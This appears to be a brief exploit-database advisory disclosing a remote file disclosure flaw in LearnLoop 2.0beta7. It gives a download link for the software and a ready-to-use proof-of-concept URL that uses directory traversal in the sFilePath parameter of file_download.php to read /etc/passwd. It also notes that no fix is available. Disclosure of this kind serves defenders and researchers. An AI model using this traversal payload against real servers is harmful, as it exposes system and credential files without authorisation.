LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability

2007-11-29 00:00:00

LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.